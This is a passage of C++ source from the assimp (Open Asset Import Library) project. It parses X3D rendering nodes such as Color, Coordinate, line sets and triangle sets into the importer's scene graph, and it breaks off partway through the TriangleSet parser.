std::shared_ptr<StreamReaderLE> reader;
LineSplitter splitter;
uint64_t evaluated_count;
const EXPRESS::ConversionSchema* schema;
};
}
} // end Assimp
#endif // INCLUDED_AI_STEPFILE_H
<|start_filename|>assimp/code/X3DImporter_Rendering.cpp<|end_filename|>
/*
Open Asset Import Library (assimp)
----------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
----------------------------------------------------------------------
*/
/// \file X3DImporter_Rendering.cpp
/// \brief Parsing data from nodes of "Rendering" set of X3D.
/// \date 2015-2016
/// \author <EMAIL>
#ifndef ASSIMP_BUILD_NO_X3D_IMPORTER
#include "X3DImporter.hpp"
#include "X3DImporter_Macro.hpp"
namespace Assimp
{
// <Color
// DEF="" ID
// USE="" IDREF
// color="" MFColor [inputOutput]
// />
void X3DImporter::ParseNode_Rendering_Color()
{
std::string use, def;
std::list<aiColor3D> color;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_REF("color", color, XML_ReadNode_GetAttrVal_AsListCol3f);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_Color, ne);
}
else
{
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_Color(NodeElement_Cur);
if(!def.empty()) ne->ID = def;
((CX3DImporter_NodeElement_Color*)ne)->Value = color;
// check for X3DMetadataObject childs.
if(!mReader->isEmptyElement())
ParseNode_Metadata(ne, "Color");
else
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
// <ColorRGBA
// DEF="" ID
// USE="" IDREF
// color="" MFColorRGBA [inputOutput]
// />
void X3DImporter::ParseNode_Rendering_ColorRGBA()
{
std::string use, def;
std::list<aiColor4D> color;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_REF("color", color, XML_ReadNode_GetAttrVal_AsListCol4f);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_ColorRGBA, ne);
}
else
{
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_ColorRGBA(NodeElement_Cur);
if(!def.empty()) ne->ID = def;
((CX3DImporter_NodeElement_ColorRGBA*)ne)->Value = color;
// check for X3DMetadataObject childs.
if(!mReader->isEmptyElement())
ParseNode_Metadata(ne, "ColorRGBA");
else
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
// <Coordinate
// DEF="" ID
// USE="" IDREF
// point="" MFVec3f [inputOutput]
// />
void X3DImporter::ParseNode_Rendering_Coordinate()
{
std::string use, def;
std::list<aiVector3D> point;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_REF("point", point, XML_ReadNode_GetAttrVal_AsListVec3f);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_Coordinate, ne);
}
else
{
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_Coordinate(NodeElement_Cur);
if(!def.empty()) ne->ID = def;
((CX3DImporter_NodeElement_Coordinate*)ne)->Value = point;
// check for X3DMetadataObject childs.
if(!mReader->isEmptyElement())
ParseNode_Metadata(ne, "Coordinate");
else
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
// <IndexedLineSet
// DEF="" ID
// USE="" IDREF
// colorIndex="" MFInt32 [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// coordIndex="" MFInt32 [initializeOnly]
// >
// <!-- ColorCoordinateContentModel -->
// ColorCoordinateContentModel is the child-node content model corresponding to IndexedLineSet, LineSet and PointSet. ColorCoordinateContentModel can
// contain any-order Coordinate node with Color (or ColorRGBA) node. No more than one instance of any single node type is allowed.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </IndexedLineSet>
void X3DImporter::ParseNode_Rendering_IndexedLineSet()
{
std::string use, def;
std::list<int32_t> colorIndex;
bool colorPerVertex = true;
std::list<int32_t> coordIndex;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_REF("colorIndex", colorIndex, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_REF("coordIndex", coordIndex, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_IndexedLineSet, ne);
}
else
{
// check data
if((coordIndex.size() < 2) || ((coordIndex.back() == (-1)) && (coordIndex.size() < 3)))
throw DeadlyImportError("IndexedLineSet must contain not empty \"coordIndex\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_IndexedSet(CX3DImporter_NodeElement::ENET_IndexedLineSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_IndexedSet& ne_alias = *((CX3DImporter_NodeElement_IndexedSet*)ne);
ne_alias.ColorIndex = colorIndex;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.CoordIndex = coordIndex;
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("IndexedLineSet");
// check for Color and Coordinate nodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("IndexedLineSet");
MACRO_NODECHECK_LOOPEND("IndexedLineSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
}
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
// <IndexedTriangleFanSet
// DEF="" ID
// USE="" IDREF
// ccw="true" SFBool [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// index="" MFInt32 [initializeOnly]
// normalPerVertex="true" SFBool [initializeOnly]
// solid="true" SFBool [initializeOnly]
// >
// <!-- ComposedGeometryContentModel -->
// ComposedGeometryContentModel is the child-node content model corresponding to X3DComposedGeometryNodes. It can contain Color (or ColorRGBA), Coordinate,
// Normal and TextureCoordinate, in any order. No more than one instance of these nodes is allowed. Multiple VertexAttribute (FloatVertexAttribute,
// Matrix3VertexAttribute, Matrix4VertexAttribute) nodes can also be contained.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </IndexedTriangleFanSet>
void X3DImporter::ParseNode_Rendering_IndexedTriangleFanSet()
{
std::string use, def;
bool ccw = true;
bool colorPerVertex = true;
std::list<int32_t> index;
bool normalPerVertex = true;
bool solid = true;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_RET("ccw", ccw, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_REF("index", index, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_CHECK_RET("normalPerVertex", normalPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_IndexedTriangleFanSet, ne);
}
else
{
// check data
if(index.size() == 0) throw DeadlyImportError("IndexedTriangleFanSet must contain not empty \"index\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_IndexedSet(CX3DImporter_NodeElement::ENET_IndexedTriangleFanSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_IndexedSet& ne_alias = *((CX3DImporter_NodeElement_IndexedSet*)ne);
ne_alias.CCW = ccw;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.CoordIndex = index;
ne_alias.NormalPerVertex = normalPerVertex;
ne_alias.Solid = solid;
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("IndexedTriangleFanSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
if(XML_CheckNode_NameEqual("Normal")) { ParseNode_Rendering_Normal(); continue; }
if(XML_CheckNode_NameEqual("TextureCoordinate")) { ParseNode_Texturing_TextureCoordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("IndexedTriangleFanSet");
MACRO_NODECHECK_LOOPEND("IndexedTriangleFanSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
}
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
// <IndexedTriangleSet
// DEF="" ID
// USE="" IDREF
// ccw="true" SFBool [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// index="" MFInt32 [initializeOnly]
// normalPerVertex="true" SFBool [initializeOnly]
// solid="true" SFBool [initializeOnly]
// >
// <!-- ComposedGeometryContentModel -->
// ComposedGeometryContentModel is the child-node content model corresponding to X3DComposedGeometryNodes. It can contain Color (or ColorRGBA), Coordinate,
// Normal and TextureCoordinate, in any order. No more than one instance of these nodes is allowed. Multiple VertexAttribute (FloatVertexAttribute,
// Matrix3VertexAttribute, Matrix4VertexAttribute) nodes can also be contained.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </IndexedTriangleSet>
void X3DImporter::ParseNode_Rendering_IndexedTriangleSet()
{
std::string use, def;
bool ccw = true;
bool colorPerVertex = true;
std::list<int32_t> index;
bool normalPerVertex = true;
bool solid = true;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_RET("ccw", ccw, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_REF("index", index, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_CHECK_RET("normalPerVertex", normalPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_IndexedTriangleSet, ne);
}
else
{
// check data
if(index.size() == 0) throw DeadlyImportError("IndexedTriangleSet must contain not empty \"index\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_IndexedSet(CX3DImporter_NodeElement::ENET_IndexedTriangleSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_IndexedSet& ne_alias = *((CX3DImporter_NodeElement_IndexedSet*)ne);
ne_alias.CCW = ccw;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.CoordIndex = index;
ne_alias.NormalPerVertex = normalPerVertex;
ne_alias.Solid = solid;
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("IndexedTriangleSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
if(XML_CheckNode_NameEqual("Normal")) { ParseNode_Rendering_Normal(); continue; }
if(XML_CheckNode_NameEqual("TextureCoordinate")) { ParseNode_Texturing_TextureCoordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("IndexedTriangleSet");
MACRO_NODECHECK_LOOPEND("IndexedTriangleSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
}
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
// <IndexedTriangleStripSet
// DEF="" ID
// USE="" IDREF
// ccw="true" SFBool [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// index="" MFInt32 [initializeOnly]
// normalPerVertex="true" SFBool [initializeOnly]
// solid="true" SFBool [initializeOnly]
// >
// <!-- ComposedGeometryContentModel -->
// ComposedGeometryContentModel is the child-node content model corresponding to X3DComposedGeometryNodes. It can contain Color (or ColorRGBA), Coordinate,
// Normal and TextureCoordinate, in any order. No more than one instance of these nodes is allowed. Multiple VertexAttribute (FloatVertexAttribute,
// Matrix3VertexAttribute, Matrix4VertexAttribute) nodes can also be contained.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </IndexedTriangleStripSet>
void X3DImporter::ParseNode_Rendering_IndexedTriangleStripSet()
{
std::string use, def;
bool ccw = true;
bool colorPerVertex = true;
std::list<int32_t> index;
bool normalPerVertex = true;
bool solid = true;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_RET("ccw", ccw, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_REF("index", index, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_CHECK_RET("normalPerVertex", normalPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_IndexedTriangleStripSet, ne);
}
else
{
// check data
if(index.size() == 0) throw DeadlyImportError("IndexedTriangleStripSet must contain not empty \"index\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_IndexedSet(CX3DImporter_NodeElement::ENET_IndexedTriangleStripSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_IndexedSet& ne_alias = *((CX3DImporter_NodeElement_IndexedSet*)ne);
ne_alias.CCW = ccw;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.CoordIndex = index;
ne_alias.NormalPerVertex = normalPerVertex;
ne_alias.Solid = solid;
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("IndexedTriangleStripSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
if(XML_CheckNode_NameEqual("Normal")) { ParseNode_Rendering_Normal(); continue; }
if(XML_CheckNode_NameEqual("TextureCoordinate")) { ParseNode_Texturing_TextureCoordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("IndexedTriangleStripSet");
MACRO_NODECHECK_LOOPEND("IndexedTriangleStripSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
}
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
// <LineSet
// DEF="" ID
// USE="" IDREF
// vertexCount="" MFInt32 [initializeOnly]
// >
// <!-- ColorCoordinateContentModel -->
// ColorCoordinateContentModel is the child-node content model corresponding to IndexedLineSet, LineSet and PointSet. ColorCoordinateContentModel can
// contain any-order Coordinate node with Color (or ColorRGBA) node. No more than one instance of any single node type is allowed.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </LineSet>
void X3DImporter::ParseNode_Rendering_LineSet()
{
std::string use, def;
std::list<int32_t> vertexCount;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_REF("vertexCount", vertexCount, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_LineSet, ne);
}
else
{
// check data
if(vertexCount.size() == 0) throw DeadlyImportError("LineSet must contain not empty \"vertexCount\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_Set(CX3DImporter_NodeElement::ENET_LineSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_Set& ne_alias = *((CX3DImporter_NodeElement_Set*)ne);
ne_alias.VertexCount = vertexCount;
// create CoordIdx
size_t coord_num = 0;
ne_alias.CoordIndex.clear();
for(std::list<int32_t>::const_iterator vc_it = ne_alias.VertexCount.begin(); vc_it != ne_alias.VertexCount.end(); vc_it++)
{
if(*vc_it < 2) throw DeadlyImportError("LineSet. vertexCount shall be greater than or equal to two.");
for(int32_t i = 0; i < *vc_it; i++) ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num++));// add vertices indices
ne_alias.CoordIndex.push_back(-1);// add face delimiter.
}
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("LineSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("LineSet");
MACRO_NODECHECK_LOOPEND("LineSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
}
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
// <PointSet
// DEF="" ID
// USE="" IDREF
// >
// <!-- ColorCoordinateContentModel -->
// ColorCoordinateContentModel is the child-node content model corresponding to IndexedLineSet, LineSet and PointSet. ColorCoordinateContentModel can
// contain any-order Coordinate node with Color (or ColorRGBA) node. No more than one instance of any single node type is allowed.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </PointSet>
void X3DImporter::ParseNode_Rendering_PointSet()
{
std::string use, def;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_PointSet, ne);
}
else
{
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_IndexedSet(CX3DImporter_NodeElement::ENET_PointSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("PointSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("PointSet");
MACRO_NODECHECK_LOOPEND("PointSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
}
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
// <TriangleFanSet
// DEF="" ID
// USE="" IDREF
// ccw="true" SFBool [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// fanCount="" MFInt32 [inputOutput]
// normalPerVertex="true" SFBool [initializeOnly]
// solid="true" SFBool [initializeOnly]
// >
// <!-- ComposedGeometryContentModel -->
// ComposedGeometryContentModel is the child-node content model corresponding to X3DComposedGeometryNodes. It can contain Color (or ColorRGBA), Coordinate,
// Normal and TextureCoordinate, in any order. No more than one instance of these nodes is allowed. Multiple VertexAttribute (FloatVertexAttribute,
// Matrix3VertexAttribute, Matrix4VertexAttribute) nodes can also be contained.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </TriangleFanSet>
void X3DImporter::ParseNode_Rendering_TriangleFanSet()
{
std::string use, def;
bool ccw = true;
bool colorPerVertex = true;
std::list<int32_t> fanCount;
bool normalPerVertex = true;
bool solid = true;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_RET("ccw", ccw, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_REF("fanCount", fanCount, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_CHECK_RET("normalPerVertex", normalPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_TriangleFanSet, ne);
}
else
{
// check data
if(fanCount.size() == 0) throw DeadlyImportError("TriangleFanSet must contain not empty \"fanCount\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_Set(CX3DImporter_NodeElement::ENET_TriangleFanSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_Set& ne_alias = *((CX3DImporter_NodeElement_Set*)ne);
ne_alias.CCW = ccw;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.VertexCount = fanCount;
ne_alias.NormalPerVertex = normalPerVertex;
ne_alias.Solid = solid;
// create CoordIdx
size_t coord_num_first, coord_num_prev;
ne_alias.CoordIndex.clear();
// assign indices for first triangle
coord_num_first = 0;
coord_num_prev = 1;
for(std::list<int32_t>::const_iterator vc_it = ne_alias.VertexCount.begin(); vc_it != ne_alias.VertexCount.end(); vc_it++)
{
if(*vc_it < 3) throw DeadlyImportError("TriangleFanSet. fanCount shall be greater than or equal to three.");
for(int32_t vc = 2; vc < *vc_it; vc++)
{
if(ccw)
{
// 2 1
// 0
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num_first));// first vertex is a center and always is [0].
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num_prev++));
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num_prev));
}
else
{
// 1 2
// 0
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num_first));// first vertex is a center and always is [0].
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num_prev + 1));
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num_prev++));
}// if(ccw) else
ne_alias.CoordIndex.push_back(-1);// add face delimiter.
}// for(int32_t vc = 2; vc < *vc_it; vc++)
coord_num_prev++;// that index will be center of next fan
coord_num_first = coord_num_prev++;// forward to next point - second point of fan
}// for(std::list<int32_t>::const_iterator vc_it = ne_alias.VertexCount.begin(); vc_it != ne_alias.VertexCount.end(); vc_it++)
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("TriangleFanSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
if(XML_CheckNode_NameEqual("Normal")) { ParseNode_Rendering_Normal(); continue; }
if(XML_CheckNode_NameEqual("TextureCoordinate")) { ParseNode_Texturing_TextureCoordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("TriangleFanSet");
MACRO_NODECHECK_LOOPEND("TriangleFanSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
}
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
// <TriangleSet
// DEF="" ID
// USE="" IDREF
// ccw="true" SFBool [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// normalPerVertex="true" SFBool [initializeOnly]
// solid="true" SFBool [initializeOnly]
// >
// <!-- ComposedGeometryContentModel -->
// ComposedGeometryContentModel is the child-node content model corresponding to X3DComposedGeometryNodes. It can contain Color (or ColorRGBA), Coordinate,
// Normal and TextureCoordinate, in any order. No more than one instance of these nodes is allowed. Multiple VertexAttribute (FloatVertexAttribute,
// Matrix3VertexAttribute, Matrix4VertexAttribute) nodes can also be contained.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </TriangleSet>
void X3DImporter::ParseNode_Rendering_TriangleSet()
{
std::string use, def;
bool ccw = true;
bool colorPerVertex = true;
bool normalPerVertex = true;
bool solid = true;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_RET("ccw", ccw, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("normalPerVertex", normalPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
